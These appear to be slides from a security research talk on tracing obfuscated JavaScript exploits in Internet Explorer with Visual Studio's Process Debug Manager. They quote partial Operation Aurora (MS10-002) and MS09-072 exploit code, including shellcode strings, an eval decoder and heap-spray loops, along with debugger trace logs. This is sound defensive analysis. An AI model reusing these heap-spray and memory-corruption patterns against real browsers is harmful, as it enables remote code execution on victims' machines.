Analysis of obfuscated Java Script exploitation using process debug manager

Ruo AndoNetwork Security Institute,

National Institute of Information and Communication Technology, Tokyo, Japan

Introductiontowards alternative Java Script debugger

• Nowadays, Java Scripts are everywhere (including Android and Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery(AJAX interface) and so on.

• Consequently, Java Scripts has become sophisticated with binary coding of attack code and obfuscation using concatenation which imposes a great burden on security analysis.

• Unfortunately, there does not exist useful debuggers specified for this kind of Java Script eploitation.

• In this paper we propose the application of extension of MS visual studio debugging extension for providing a new techniques for tracing Java Script behavior.

• Proposed system could extract features of some representative web attacks such as google Operation Aurora (MS10-002), IE styleObject(MS09-072) exploit.

the old new thing; impact and memory of google aurora operationultra-sophisticated advanced persistent attack

• The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of Threat Research at cyber security company McAfee which informs this attack of WhiteHouse on Janurary 2010.

• Origin: Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China.

• Ultra sophisticated: The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack. The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.

• Google and china: As a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices.Official Chinese media responded stating that the incident is part of a U.S. government conspiracy. Aurora operation is said to be Chinese Government’s attempts to wipe out Google from mainland.

BACKGROUND: attack vector is very short. But …Can we analyze (or debug) this IE exploitation using

commodity probes?<html><head><script>

var sc = unescape("%u9090%u19eb%u4b5b%..)var sss = Array (826, 679, 798, 224, 770, 427, 819,

770, 707, 805, 693, 679, 784, 707, 280, 238, 259, 819, 336, 693, 336, 700, 259, 819, 336,

224, 770, 427, 770, 322, 805, 819, 686, 805, 812, 798, 735, 770, 721, 280, 336, 448, 371);var arr = new Array;for (var i = 0; i < sss.length; i ++) {

arr[i] = String.fromCharCode (sss [i] / 7);} var cc = arr.toString ();cc = cc.replace (/,/g, "");cc = cc.replace (/@/g, ",");eval (cc);var x1 = new Array ();for (i = 0; i < 200; i ++) {

x1 [i] = document.createElement ("COMMENT")x1 [i].data = "abc";

}; var e1 = null;

</body>

function ev1 (evt){

e1 = document.createEventObject (evt);document.getElementById ("sp1").innerHTML = "";window.setInterval (ev2, 50);

}function ev2 (){

p = "¥u0c0d¥uu0c0d¥u0c0d¥u0c0d";for (i = 0; i < x1.length; i ++) {

x1 [i].data = p;};var t = e1.srcElement;

}</script></head>

<body><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)" width="16" height="16"></span>

It is impossible to trace the script engines’ behavior allocating memory and gif processing !

the new old thing: web attack and Java Script

• Java Scripts are everywhere (including Android and Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on.

• Unfortunately again, there have not been striking probing (debugging) frames for tracing Java Script behavior such as google aurora operation said before.

• In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) debugging extension for tracking some famous Java Script exploitation dynamically.

• Windows OS has longer history and therefore more mature interfaces to probe Java Script Execution.

• We can conclude Microsoft PDM extension provide new aspect for analyzing malicious Java Script.

• Techniques we have obtained here could be applied for constructing probe modules for other systems such as Dalvik VM of Android because the Java Script behavior should be the same regardless of OS (platform) types.

Commodity Debugger is not always enough ! Java Script and its semantic gap

• Current popular debugging tools such as ollyDBG and winDBG are not optimized (or enough) for tracing the behavior of Web scripting.

• Sementic gap between kernel / user mode debugger and web application execution layer.

MS Active Scripting Engine

MS Dynamic Link BinariesJscript.DLL etc

USER mode debugger

Memory Allocate Read/Write File I/O request

Malicious Java Script

KERNEL mode debugger

Native I/O request IRQ packets

Semantic GapCan’t understand what is going on

Bad thing has been happened

• Semantic gap means that probe running in user / kernel mode layer lacks the knowledge of higher level events such as web browser property change.

We can’t estimate theevent occurred above by naïve memory and IO request. API.

PDM and SDM: an extension of Microsoft Visual Studio 2005 – 2010

and later

• PDM and SDM are components of the extension of Microsoft Visual Studio Extension.

• PDM and SDM provides higher level of debugging view mainly for web scripting such as Java Script.

• Process Debug Manager (PDM) is a component to make all running programs available to VSPackage(Visual Studio debugger components).

• By registering PDM, we can track the function call of high-level API invoked by web browser. Also, property change (such as variable substitution) can be logged.

Manage chain: PDM makes the target process available to SDM and DE. Session debug manager (SDM) manages several Debug Engine (DE). DE uses expression evaluator and symbol handler. SDM wraps IDebugExpression2 interface to obtain a stack frame with a help of DE by IDebugThread2::EnumFrameInfo.

Behavior description of Java Script in this paper

①File Namer = debugDocument[i]->GetName(DOCUMENTNAMETYPE_URL,&filenameStr[i]);

②Function fDesc[i].pdsf->GetDescriptionString(0,&functionStr[i]);b2s(functionStr[i],function,BUFLEN);

③Code (substitution)debugProperty = funcs->getDebugProperty(f);getPropertyInfoRecursive(debugProperty,props,0);

④Code(loop)props->propertyIsChanged(propInfos[i].m_bstrFullName,propInfos[i].m_bstrValue)==TRUE)

Sample output: www.yahoo.co.jpStart Logging On: 2011/02/18 19:16:49Process ID:7072MaxDepth 1Process Name:Windows Internet ExplorerFilename:http://www.yahoo.co.jp/Function:JScript global code

window:DispHTMLWindow2:{...}err:Object:{...}ver:Undefined:undefinedYAHOO:Undefined:undefinedd:Undefined:undefined$:Undefined:undefined

14:var ver="ga3_ie"ver:String:"ga3_ie"

15:if(typeof YAHOO=="undefined"||!YAHOO)15:var YAHOO={}

YAHOO:Object:{...}15:YAHOO.namespace=function(){var

a=arguments,b=null,d,e,c;for(d=0;d<a.length;d=d+1){c=(""+a[d]).split(".");b=YAHOO;for(e=(c[0]=="YAHOO")?1:0;e<c.length;e=e+1){b[c[e]]=b[c[e]]||{};b=b[c[e]]}}return b}

……

Process ID of IE

Depth of logging

Function invoked

Property change

Executed code substitute

Executed code Loop

Proposed system: IE initialization and main loop

Internet Explorer

Internet Explorer(debuggee)

Published by PDM and SDM

(VS DGB extension)

①URL: what kinds of URL accessed ? hr = sfDesc[i].pdsf->GetCodeContext(&codeContext);

if(hr!=S_OK){goto out ;}hr = codeContext->GetDocumentContext(&docContext[i]);

if(hr!=S_OK){goto out;}hr = docContext[i]->GetDocument(&debugDocument[i]);

if(hr!=S_OK){goto out;}hr = debugDocument[i]->GetName

(DOCUMENTNAMETYPE_URL,&filenameStr[i]);

②Property Change: ②－１：What kinds of function invoked ? sfDesc[i].pdsf->GetDescriptionString(0,&functionStr[i]);

b2s(functionStr[i],function,BUFLEN);

②－２：What kinds of variables changed ?debugProperty = funcs->getDebugProperty(f);

getPropertyInfoRecursive(debugProperty,props,0);

Main loop IApplicationDebugger::onHandleBreakPoint

Two core interfaces of SDM / PDM• IRemoteDebugApplication Interface

This registered interface allows the session debug manager (SDM) to obtain information about programs that have been "published" through the IDebugProgramPublisher2 interface.

Outside the debuggerDebugger connect, start and stop

• IApplicationDebugger InterfaceRepresents a running application. It does not need to correspond to an operating-system process. Typically, a debugger targets an application for debugging. The Process Debug Manager typically implements the application object.

Inside the debuggerCauseBreak, handling breakPoint

Publishing IE (1)injecting my callbacks

hr =PDM->WatchForProviderEvents(0, // Tell the PDM that we want it to stop

watchingNULL,

// The PDMimplementation of this interface does

not require the 'port' parameterprocessId,

// the process id to queryScriptEngineFilter,

// We are interested in script codeGUID_NULL,

// no launching enginepMyCallback

// callback interface);

Establishes a locale for any language-specific resources needed by the DE.

IDebugProgramProvider2::SetLocale

Establishes a callback to watch for provider events associated with specific kinds of processes.

IDebugProgramProvider2::WatchForProviderEvents

Gets a program node, given a specific process ID.

IDebugProgramProvider2::GetProviderProgramNode

Obtains information about programs running, filtered in a variety of ways.

IDebugProgramProvider2::GetProviderProcessData

descriptionmethod

Callbacks to inject

Publishing IE (2)querying and unmarshaling before launch

for(DWORD pnode = 0;pnode<procData.ProgramNodes.dwCount;pnode++){

IDebugProviderProgramNode2 *dppn;

hr = procData.ProgramNodes.Members[pnode]->QueryInterface(__uuidof(IDebugProviderProgramNode2),(void**)&dppn);

if(hr == S_OK){IRemoteDebugApplication *rda;hr = dppn->UnmarshalDebuggeeInterface

(__uuidof(IRemoteDebugApplication),(void**)&rda);

if(hr == S_OK){procList[numScriptProcs]=processes[cp];applicationDebugger[numScriptProcs] = newJSLogApplicationDebugger(processId.ProcessId.dwProcessId,rda,maxDepth,maxStack,heckGlobal);applicationDebugger[numScriptProcs]->startDebugging();numScriptProcs++;

}

CHECK 1QueryInterface: inspects wheter the object (IE in this case) supports a certain COM interace. If this method returns S_OK, Windows OS increments the object reference count and the application can use the interface.

CHECK 2

This method is used when the debug engine is running in the Visual Studio process space and the program being debugged is running in its own process space. Obtains a specified interfaceacross process boundaries.

OK. Start debugger using IRemoteDebugApplication Interface

Two core interfaces of proposed system: active script debugger interface

• IRemoteDebugApplication Interface for connect / start / stop debugger of IE

Enumerates the global expression contexts for all languages running in this application.

IRemoteDebugApplication::EnumGlobalExpressionContexts

Returns the application node under which all nodes associated with the application are added.IRemoteDebugApplication::GetRootNode

Returns the name of this application node.IRemoteDebugApplication::GetName

Enumerates all threads known to be associated with the application.

IRemoteDebugApplication::EnumThreads

Indicates if the application is responsive.IRemoteDebugApplication::QueryAlive

Provides a mechanism for the debugger IDE, running out-of-process to the application, to create objects in the application process.

IRemoteDebugApplication::CreateInstanceAtApplication

Returns the current debugger connected to the application.IRemoteDebugApplication::GetDebugger

Disconnects the current debugger from the application.IRemoteDebugApplication::DisconnectDebugger

Connects a debugger to this application.IRemoteDebugApplication::ConnectDebugger

Causes the application to break into the debugger at the earliest opportunity.IRemoteDebugApplication::CauseBreak

Continues an application that is currently in a breakpoint.IRemoteDebugApplication::ResumeFromBreakPoint

Two core interfaces of proposed system: active script debugger interface

• IDebugApplication Interface for cause/handle breakpoint of IE

Establishes a locale for any language-specific resources needed by the DE.

IDebugProgramProvider2::SetLocale

Establishes a callback to watch for provider events associated with specific kinds of processes.

IDebugProgramProvider2::WatchForProviderEvents

Gets a program node, given a specific process ID.

IDebugProgramProvider2::GetProviderProgramNode

Obtains information about programs running, filtered in a variety of ways.

IDebugProgramProvider2::GetProviderProcessData

descriptionmethod

Visual Studio Debugging Extensibility:http://msdn.microsoft.com/en-US/library/bb147088%28v=VS.80%29.aspx

Property change detection in the main loopDigging stack frames online

①Get Function NamesfDesc[i].pdsf-

>GetDescriptionString(0,&functionStr[i]);

②Get File and URLDebugCodeContext* codeContext;hr = sfDesc[i].pdsf-

>GetCodeContext(&codeContext);

③Get Property ChangedebugProperty = funcs-

>getDebugProperty(f);getPropertyInfoRecursive(debugProperty,props,0);

typedef structtagDebugStackFrameDescriptor {

IDebugStackFrame *pdsf;DWORD_PTR dwMin; DWORD_PTR dwLim;

BOOL fFinal; IUnknown *punkFinal;

} DebugStackFrameDescriptor;

typedef structDebugPropertyInfo{

DBGPROP_INFO_FLAGS dwValidFields; BSTR bstrName; BSTR bstrType; BSTR bstrValue;

BSTR bstrFullName; DBGPROP_ATTRIB_FLAGS dwAttrib;

IDebugProperty* pDebugProp; };

IDebugStackFrame::GetCodeContextIDebugStackFrame::GetDescriptionStringIDebugStackFrame::GetLanguageString

IDebugStackFrame::GetThread

Inspecting stack frames

Experiment①Google Aurora Attack (MS10-002 HTML object memory corruption)MS10-002 is HTML object memory corruption, known as Google aurora attack.This cyber attack began in mid 2009 and first publicly disclosed by Google on January by a blog post. The attack was also named as ”Operation Aurora” by Dmitri Alperovitch. McAfee Labs discovered that Aurora was included file path on the attacker’s machine.• MSB-MS10-002• CVE-2010-0249• OSVDB-61697

② Active Directory Federation Service Attack (MS09-072 ATL headers vulnerability)MS09-072 is the vulnerability of Internet Explorer, which affects Microsoft Active Directory Federation Service (ADFS). In MS07-072, an active X control build with Microsoft Active Template Library (ATL) headers could allow advisory to execute remote code. The ATL vulnerability prompted an out-of-band release earlier this year from Microsoft.• MSB-MS09-072• CVE-2009-3672• OSVDB-50622• BID-37085

Experiment Google Aurora Attack1: Start Logging On: 2011/05/30 23:13:542: Process ID:36523: MaxDepth 24: Process Name:Windows Internet Explorer5: Filename:http://192.168.20.160:8080/qMoTNjaQzbNF6: Function:JScript global code7: window:DispHTMLWindow2:{...}8: window.clientInformation:Object:{...}9: --- snip ---

10: window.event:IHTMLEventObj:null11: window.external:Object:{...}12: window.frameElement:IHTMLFrameBase:null13: window.window:DispHTMLWindow2:{...}14: pNrDlDURxbASLo:Undefined:undefined15: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:Undefined:undefined16: CLLFyYpDX:Undefined:undefined17: HBohOxVqidZHilqXmLPfqaMYiv:Undefined:undefined18: 5:var pNrDlDURxbASLo = '0c053e66...'19: pNrDlDURxbASLo:String:"0c053e66..."20: 6:var OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl = ''21: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s]"

22: 7:i = 023: i:Number:024: 7:i<pNrDlDURxbASLo.length25: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl +=26: String.fromCharCode27: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))28: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s]"29: 7:i+=230: i:Number:231: 7:i<pNrDlDURxbASLo.length32: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl +=33: String.fromCharCode34: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))35: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s][s]"

Payload

Anomaly Loop detected!Exploit or Heap spray?

var n=unescape("%u0c0d%u0c0d");while(n.length<=524288) n+=n;n=n.substring(0,524269-sc.length);var x=new Array();for(var i=0;i<200;i++) {x[i]=n+sc;}

Experiment MS09-0721: Start Logging On: 2011/05/31 00:18:462: Process ID:6883: MaxDepth 24: Process Name:Windows Internet Explorer5: Filename:http://192.168.20.160:8080/1FysKckbN6: Function:JScript - onload function7: 20:sFsSfxRecSIXauNmBnB()8: Function:sFsSfxRecSIXauNmBnB9: DRBfZcPV:Undefined:undefined10: AcHKfoIb:Undefined:undefined

14: 6:var DRBfZcPV = unescape15: DRBfZcPV:Object:{...}16: 7:var AcHKfoIb =DRBfZcPV('%u350d%ufc03%u747a%u4976%u2593%f9f%' )17: AcHKfoIb:String:"*******"18: 8:var OSGwFEcn =19: DRBfZcPV( "%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0")20: OSGwFEcn:String:"**"21: 9:var pGgrrYDr = 20 + AcHKfoIb.length22: pGgrrYDr:Number:52023: 10:while (OSGwFEcn.length < pGgrrYDr)24: 10:OSGwFEcn +=OSGwFEcn25: OSGwFEcn:String:"****"26: 10:while (OSGwFEcn.length < pGgrrYDr)27: 10:OSGwFEcn+=OSGwFEcn28: OSGwFEcnn:String:"********"29: 10:while (OSGwFEcn.length < pGgrrYDr)30: 10:OSGwFEcn+=OSGwFEcn31: OSGwFEcn:String:"******************"32: 10:while (OSGwFEcn.length < pGgrrYDr)33: 10:OSGwFEcn+=OSGwFEcn34: OSGwFEcn:String:"**********************************"I

Anomaly loop detected!Malicious code is scanning Memory …

Payload?

Conclusion and further works

Writing alternative Java Script debugger is exciting challenge!

It works partly now.• Java Scripts are everywhere (including Android and Google App Engine)

with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on.

• However and further work: there have not been striking probing (debugging) frames for tracing Java Script behavior.

• In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) debugging extension for tracking some famous Java Script exploitation dynamically.

Extensibility for other operating systems and platforms • Windows OS is the shortest path to understand Java Script behavior.

Windows OS has longer history and therefore more mature interfaces to probe Java Script Execution. Techniques we have obtained here could be applied for constructing probe modules for other systems such as Dalvik VM of Android because the Java Script behavior should be the same regardless of OS (platform) types.

IT IS NOT ENOUGH :- Memory dump is necessary, eventuallyidea: anomaly loop detection of Java Script + active memory monitoring by DLL injection etc.